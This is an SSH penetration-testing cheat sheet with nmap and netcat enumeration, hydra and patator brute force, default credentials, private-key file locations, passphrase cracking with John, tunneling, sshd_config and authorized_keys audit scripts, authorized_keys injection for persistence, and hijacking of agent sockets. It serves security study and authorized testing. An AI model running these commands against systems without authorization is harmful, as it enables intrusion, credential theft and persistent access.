Secure Shell Protocol
Environment Variables / Setup
export IP=
export PORT=22
Phase 1: Service Enumeration
Nmap SSH Scripts
# ssh2-enum-algos lists the offered kex/host-key/cipher/MAC algorithms, ssh-hostkey prints host key fingerprints (the same key on several hosts means cloned images), ssh-auth-methods shows the auth methods offered for the account given in ssh.user
nmap -sV --script=ssh2-enum-algos,ssh-hostkey,ssh-auth-methods --script-args ssh.user=root -p$PORT $IP
SSH Version and Banner Grabbing
# The server sends its identification string (e.g. SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5) as the first line after connect, so any TCP client can read it
nc -nv $IP $PORT
telnet $IP $PORT
# The verbose client also reports it ("remote software version ...") before authenticating
ssh -v -p $PORT $IP
# Note: ssh -V prints the LOCAL client version, not the target's
ssh -V
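Once you have a banner, the useful step is to parse it and compare the OpenSSH version against the issues listed later on this page. The script below is an added example, not part of the original notes: it splits an identification string into protocol version and software, and flags OpenSSH releases in the CVE-2018-15473 username-enumeration range (OpenSSH through 7.7). The function names, the nc-based grabber and the three sample banners are assumptions made up for this example; no real host was captured.

```sh
#!/bin/sh
# Added example, not part of the original notes: parse an SSH identification
# string such as "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7" and flag OpenSSH
# releases still affected by CVE-2018-15473 username enumeration (OpenSSH
# through 7.7). Function names and the sample banners are made up here.

# Protocol version field, e.g. "2.0".
ssh_banner_proto() {
    printf '%s\n' "$1" | sed -n 's/^SSH-\([0-9.]*\)-.*/\1/p'
}

# Software field: first token after the protocol version, e.g. "OpenSSH_7.4p1".
ssh_banner_software() {
    printf '%s\n' "$1" | sed -n 's/^SSH-[0-9.]*-\([^ ]*\).*/\1/p'
}

# OpenSSH "major.minor" (7.4 for OpenSSH_7.4p1); empty for other servers.
openssh_version() {
    printf '%s\n' "$1" | sed -n 's/^SSH-[0-9.]*-OpenSSH_\([0-9]*\.[0-9]*\).*/\1/p'
}

# True (exit 0) when the banner is OpenSSH <= 7.7, the CVE-2018-15473 range.
openssh_user_enum_candidate() {
    v=$(openssh_version "$1")
    [ -n "$v" ] || return 1
    major=${v%%.*}
    minor=${v#*.}
    [ "$major" -lt 7 ] || { [ "$major" -eq 7 ] && [ "$minor" -le 7 ]; }
}

# Live use (assumes nc(1)): the server speaks first, so one line is enough;
# the sleep keeps stdin open long enough for the banner to arrive.
grab_ssh_banner() {
    sleep 2 | nc "$1" "${2:-22}" 2>/dev/null | head -n 1 | tr -d '\r'
}

# Constructed sample banners (not captured from any real host).
SAMPLE_OLD="SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7"
SAMPLE_NEW="SSH-2.0-OpenSSH_9.6"
SAMPLE_OTHER="SSH-2.0-dropbear_2020.81"

if [ "${1:-}" = "--demo" ]; then
    for b in "$SAMPLE_OLD" "$SAMPLE_NEW" "$SAMPLE_OTHER"; do
        if openssh_user_enum_candidate "$b"; then tag="CHECK CVE-2018-15473"; else tag="ok"; fi
        printf '%-40s proto=%s software=%s %s\n' "$b" \
            "$(ssh_banner_proto "$b")" "$(ssh_banner_software "$b")" "$tag"
    done
fi
```

Run it with --demo to see the three samples classified, or feed grab_ssh_banner "$IP" "$PORT" into the same functions. Treat the result as a hint rather than proof: distributions backport fixes, so a Debian OpenSSH_7.4p1 banner may already carry the CVE-2018-15473 patch, and ssh-audit or a dedicated check is needed to confirm.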
SSH-Audit (Security Assessment)
# Lists the offered kex/host-key/cipher/MAC algorithms, grades each one, and reports known CVEs for the detected software version
ssh-audit -p $PORT $IP
Phase 2: Authentication Testing
Username Enumeration
Some SSH implementations leak valid usernames. OpenSSH through 7.7 does so via CVE-2018-15473 (a malformed authentication request is handled differently for existing and non-existing accounts), which needs a dedicated checker such as Metasploit's auxiliary/scanner/ssh/ssh_enumusers. The loop below does not detect that: modern sshd prints the same "Permission denied (publickey,password)" for valid and invalid names. What it does show is which authentication methods the server offers per account, which is worth knowing before you try passwords or keys:
# Test common usernames (BatchMode avoids prompts, ConnectTimeout stops hangs)
for user in root admin administrator user test guest; do
echo "Testing: $user"
ssh -p $PORT -o BatchMode=yes -o ConnectTimeout=5 -o StrictHostKeyChecking=no -o PreferredAuthentications=none -o PubkeyAuthentication=no $user@$IP 2>&1 | grep -E "(Permission denied|Authentication failed|No supported authentication methods)"
done
Brute Force (If Other Vectors Fail)
Use sparingly and only when no other options remain: it is noisy, it can lock accounts (pam_faillock, fail2ban), and sshd's MaxAuthTries and MaxStartups throttle it. Prefer a short, targeted password list over rockyou.txt, keep threads low (-t 4), and include the port when it is not 22:
# With hydra (small wordlist only)
hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -t 4 ssh://$IP:$PORT
# With patator (ignore the failure message so only successes are shown)
patator ssh_login host=$IP port=$PORT user=FILE0 password=FILE1 0=/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt 1=/usr/share/wordlists/rockyou.txt -x ignore:mesg='Authentication failed.'
Default Credentials Testing
# Common SSH default credentials:
root:root
admin:admin
user:user
pi:raspberry (Raspberry Pi)
ubuntu:ubuntu
Phase 3: Key-Based Authentication
SSH Key Discovery
Look for SSH keys in web directories, file shares, backups, or other services. A private key file starts with -----BEGIN ... PRIVATE KEY-----; authorized_keys and known_hosts files are also worth grabbing because they reveal account names and hosts:
# Common SSH key locations to check:
/.ssh/id_rsa
/.ssh/id_dsa
/.ssh/id_ecdsa
/.ssh/id_ed25519
/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/root/.ssh/id_rsa
SSH Key Permissions Check
If you find a private key, ssh refuses to load it while it is readable by others ("UNPROTECTED PRIVATE KEY FILE"), so tighten it first. ssh-keygen -y -f id_rsa prints the matching public key, which you can search for in authorized_keys files to learn which accounts the key opens:
chmod 600 id_rsa
ssh -i id_rsa -p $PORT user@$IP
SSH Key Cracking
If the private key is encrypted (legacy PEM keys carry a "Proc-Type: 4,ENCRYPTED" header; new-format "OPENSSH PRIVATE KEY" files give no hint in the header, but ssh-keygen -y -f id_rsa prompts for a passphrase), crack the passphrase offline. New-format keys use a bcrypt KDF, so they crack far more slowly than PEM keys:
# Convert to John format (Kali ships the script as /usr/share/john/ssh2john.py)
ssh2john id_rsa > id_rsa.hash
# Crack with John
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Phase 4: SSH Tunneling & Port Forwarding
Local Port Forwarding
Forward a local port to a service that is reachable from the target but not from you (internal web app, database, RDP):
ssh -p $PORT -L local_port:target_ip:target_port user@$IP
# e.g. -L 8080:10.0.0.5:80 then browse http://127.0.0.1:8080; add -N to skip the remote shell and -f to background the tunnel
Dynamic Port Forwarding (SOCKS Proxy)
ssh -p $PORT -D 9050 user@$IP
# Configure proxychains to use 127.0.0.1:9050 (socks5 127.0.0.1 9050 in proxychains.conf) and prefix tools with proxychains
Remote Port Forwarding
Expose a port on your machine to the target side (reverse tunnel, e.g. to serve tools or catch callbacks). Without GatewayPorts on the server the remote end binds to the target's loopback only:
ssh -p $PORT -R remote_port:local_ip:local_port user@$IP
Phase 5: SSH Configuration Analysis
Check SSH Configuration
If you gain access, check the daemon config (and any Include'd files such as /etc/ssh/sshd_config.d/*.conf on newer distributions) for weaknesses. Keywords are case-insensitive, the first occurrence of a keyword wins, Match blocks can override it for specific users or hosts, and an unset keyword takes sshd's default (PasswordAuthentication defaults to yes, PermitRootLogin to prohibit-password since OpenSSH 7.0):
cat /etc/ssh/sshd_config
Look for:
- PermitRootLogin yes (root can log in with a password)
- PasswordAuthentication yes (passwords accepted, so brute force and credential reuse work; also the default when unset)
- PermitEmptyPasswords yes (accounts with an empty password can log in)
- X11Forwarding yes (a compromised server can reach connecting clients' X displays)
- AuthorizedKeysFile / AuthorizedKeysCommand (where a planted key has to go, or whether keys come from somewhere else entirely)
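Reading sshd_config by eye is error-prone because of the first-occurrence rule, Match blocks and defaults. The script below is an added example, not part of the original notes: it resolves the effective global value of each keyword in the list above the way sshd does, applies sshd's defaults for unset keywords, and reports which weak settings are in effect. It is not ssh-audit or any project's code; the function names and both sample configs (a weak one and its hardened counterpart) are constructed for this example.

```sh
#!/bin/sh
# Added example, not part of the original notes: audit an sshd_config for the
# weak settings listed above, following sshd's own rules: keywords are
# case-insensitive, "#" starts a comment, "Keyword value" and "Keyword=value"
# are equivalent, the FIRST occurrence of a keyword wins, and everything after
# a Match line is conditional. Unset keywords fall back to sshd's defaults.
# Function names and the two sample configs are made up for this example.

# Effective global value of a keyword, lower-cased; empty if not set.
# Usage: sshd_effective_value <config-file> <keyword>
sshd_effective_value() {
    awk -F '[ \t=]+' -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
        { sub(/#.*/, ""); sub(/^[ \t]+/, "") }   # drop comments, leading blanks
        NF == 0                { next }           # blank line
        tolower($1) == "match" { exit }           # rest is conditional
        tolower($1) == key     { print tolower($2); exit }
    ' "$1"
}

# sshd defaults for the keywords we care about (OpenSSH 7.0 and later).
sshd_default_value() {
    case "$(printf '%s' "$1" | tr 'A-Z' 'a-z')" in
        permitrootlogin)        echo prohibit-password ;;
        passwordauthentication) echo yes ;;
        permitemptypasswords)   echo no ;;
        x11forwarding)          echo no ;;
        *)                      echo "" ;;
    esac
}

# Print "Keyword=value (explicit|default)" for each weak setting in effect.
# Exit 0 if anything weak was found, 1 if the config is clean.
sshd_weak_settings() {
    found=1
    for kv in PermitRootLogin=yes PasswordAuthentication=yes \
              PermitEmptyPasswords=yes X11Forwarding=yes; do
        key=${kv%=*}; bad=${kv#*=}
        val=$(sshd_effective_value "$1" "$key"); src=explicit
        if [ -z "$val" ]; then val=$(sshd_default_value "$key"); src=default; fi
        if [ "$val" = "$bad" ]; then
            printf '%s=%s (%s)\n' "$key" "$val" "$src"
            found=0
        fi
    done
    return $found
}

# Constructed samples: a weak config and its hardened counterpart.
SAMPLE_WEAK=$(mktemp); SAMPLE_HARDENED=$(mktemp)
trap 'rm -f "$SAMPLE_WEAK" "$SAMPLE_HARDENED"' EXIT
cat >"$SAMPLE_WEAK" <<'EOF'
Port 22
permitrootlogin yes
PermitRootLogin no            # second occurrence: ignored by sshd
#PasswordAuthentication no    # commented out, so the default (yes) applies
X11Forwarding no
Match User deploy
    PermitEmptyPasswords yes   # conditional: only for user deploy
EOF
cat >"$SAMPLE_HARDENED" <<'EOF'
PermitRootLogin prohibit-password
PasswordAuthentication=no
PermitEmptyPasswords no
X11Forwarding no
EOF

if [ "${1:-}" = "--demo" ]; then
    for f in "$SAMPLE_WEAK" "$SAMPLE_HARDENED"; do
        echo "== $f"
        sshd_weak_settings "$f" || echo "no weak settings"
    done
fi
```

Run with --demo: the weak sample reports PermitRootLogin=yes (explicit) and PasswordAuthentication=yes (default) and nothing for PermitEmptyPasswords, because that line only applies inside the Match block. When you are root on the box, sshd -T prints the fully resolved configuration (and sshd -T -C user=deploy the values a given connection would get), which is the authoritative answer where this script only resolves the global section.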
SSH Authorized Keys
Each line is [options] keytype base64 [comment]; the comment usually names the owning account or host, and options such as command=, from= or restrict limit what the key can do:
cat ~/.ssh/authorized_keys
cat /root/.ssh/authorized_keys
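The options field makes authorized_keys awkward to read with cut or awk alone, since a forced command may contain spaces. The script below is an added example, not part of the original notes, serving both the review of existing authorized_keys above and the key-injection step later on this page: it parses each entry, separates options from key type, key material and comment, flags entries that grant an unrestricted login, and checks whether a given key is already present. Function names are made up and the sample file uses dummy key material, not real keys.

```sh
#!/bin/sh
# Added example, not part of the original notes: summarise an authorized_keys
# file entry by entry, separating the optional options field (which may hold
# quoted strings with spaces, e.g. command="/usr/bin/rrsync /srv/backup")
# from the key type, key material and comment, and flag entries that carry
# no command=, from= or restrict option. Those are the entries that give an
# unrestricted login, and the ones an injected key should look like.
# Function names and the sample file are made up; the key material is dummy.

# One line per entry: "<restricted|UNRESTRICTED> type=.. options=.. comment=.."
authorized_keys_summary() {
    awk '
        BEGIN {
            keytype = "^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp(256|384|521)|sk-)"
            keydata = "^AAAA[A-Za-z0-9+/=]*$"   # all SSH public keys start AAAA
        }
        NF == 0 || $1 ~ /^#/ { next }
        {
            # the key is the first "type base64" pair; everything before it is options
            i = 0
            for (j = 1; j < NF; j++) {
                if ($j ~ keytype && $(j+1) ~ keydata) { i = j; break }
            }
            if (i == 0) { printf "unparsed\t%s\n", $0; next }
            opts = ""
            for (j = 1; j < i; j++) opts = opts (j > 1 ? " " : "") $j
            comment = ""
            for (j = i + 2; j <= NF; j++) comment = comment (j > i + 2 ? " " : "") $j
            if (opts ~ /^(command=|from=|restrict)/ || opts ~ /[, ](command=|from=|restrict)/)
                flag = "restricted"
            else
                flag = "UNRESTRICTED"
            printf "%s\ttype=%s\toptions=%s\tcomment=%s\n", flag, $i,
                   (opts == "" ? "-" : opts), (comment == "" ? "-" : comment)
        }' "$1"
}

# Number of entries that grant an unrestricted login.
authorized_keys_unrestricted_count() {
    authorized_keys_summary "$1" | grep -c '^UNRESTRICTED' || :
}

# Exit 0 if the given base64 key material is already present (e.g. to verify
# an injected key landed, or that a found private key's public half is here).
authorized_keys_has_key() {
    grep -qF -- "$2" "$1"
}

# Constructed sample authorized_keys (dummy key material, not real keys).
SAMPLE_AUTHORIZED_KEYS=$(mktemp)
trap 'rm -f "$SAMPLE_AUTHORIZED_KEYS"' EXIT
cat >"$SAMPLE_AUTHORIZED_KEYS" <<'EOF'
# constructed sample, not from a real host
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDummyDummyDummyDummyDummyDummyDummyDummy admin@workstation
command="/usr/bin/rrsync /srv/backup",no-pty,no-port-forwarding ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABDummy backup@nas
from="10.0.0.0/8",restrict ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDummy2 ops@bastion
ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIDummy3
EOF

if [ "${1:-}" = "--demo" ]; then
    authorized_keys_summary "$SAMPLE_AUTHORIZED_KEYS"
    echo "unrestricted entries: $(authorized_keys_unrestricted_count "$SAMPLE_AUTHORIZED_KEYS")"
fi
```

On the sample, the first and last entries are UNRESTRICTED and the two with command= and from=,restrict are restricted. "restricted" only means the login is limited to what the forced command or source filter allows; whether that command is itself abusable is a separate question. A pathological forced command containing a literal "ssh-rsa AAAA..." would confuse the parser, which is acceptable for triage but worth knowing.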
Common SSH Attack Vectors
SSH Key Injection
If you can write to a user's authorized_keys, append your public key (the contents of the .pub file, one line). With StrictModes on (the default) sshd ignores the file when the home directory, ~/.ssh or authorized_keys is writable by group or others, so fix ownership and modes after writing:
echo "your_public_key" >> ~/.ssh/authorized_keys
chmod 700 ~/.ssh && chmod 600 ~/.ssh/authorized_keys
SSH Escape Sequences
Client-side: in an existing session press Enter, then ~C, to get the ssh> prompt and add forwardings without reconnecting (useful when you can log in but cannot open a second session). OpenSSH 9.2 and later disable this prompt unless the client sets EnableEscapeCommandline=yes. It does not escape a restricted shell on the server: sshd sets up the forwarding regardless of which shell you got, as long as AllowTcpForwarding or a forced command does not forbid it:
~C
ssh> -L 8080:localhost:80
SSH Agent Hijacking
If another user connected with agent forwarding (ssh -A), sshd created a socket /tmp/ssh-XXXXXXXX/agent.<pid> owned by that user. Root (or that user) can point SSH_AUTH_SOCK at it and authenticate with their keys for as long as their session lasts; the private keys never leave their client, so this works only while they stay connected. The socket path below is a placeholder, take the real one from the ls output (ssh-add -l with the same SSH_AUTH_SOCK lists what the agent holds):
ls -la /tmp/ssh-*/agent.*
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXX/agent.1234 ssh user@target
SSH Vulnerabilities to Check
Known SSH CVEs
- CVE-2018-15473 - Username enumeration (OpenSSH through 7.7)
- CVE-2020-15778 - scp command injection: shell metacharacters in the remote file name are executed on the server (OpenSSH through 8.3p1), relevant where scp is allowed but a shell is not
- CVE-2021-41617 - Privilege escalation: sshd 6.2 through 8.7 ran AuthorizedKeysCommand / AuthorizedPrincipalsCommand with the wrong supplementary groups when configured to run them as a different user
Weak Algorithms
Look for deprecated/weak algorithms in the ssh2-enum-algos or ssh-audit output:
- 3DES, arcfour and CBC-mode ciphers
- MD5 and SHA-1 HMACs (hmac-md5, hmac-sha1)
- SHA-1 key exchange (diffie-hellman-group1-sha1, diffie-hellman-group-exchange-sha1) and ssh-rsa (SHA-1) signatures, which OpenSSH 8.8+ clients refuse by default
Next Steps
Once SSH access is obtained:
- Enumerate system information
- Check for privilege escalation vectors
- Look for credentials in user files
- Set up persistence if needed (e.g. your own key in authorized_keys)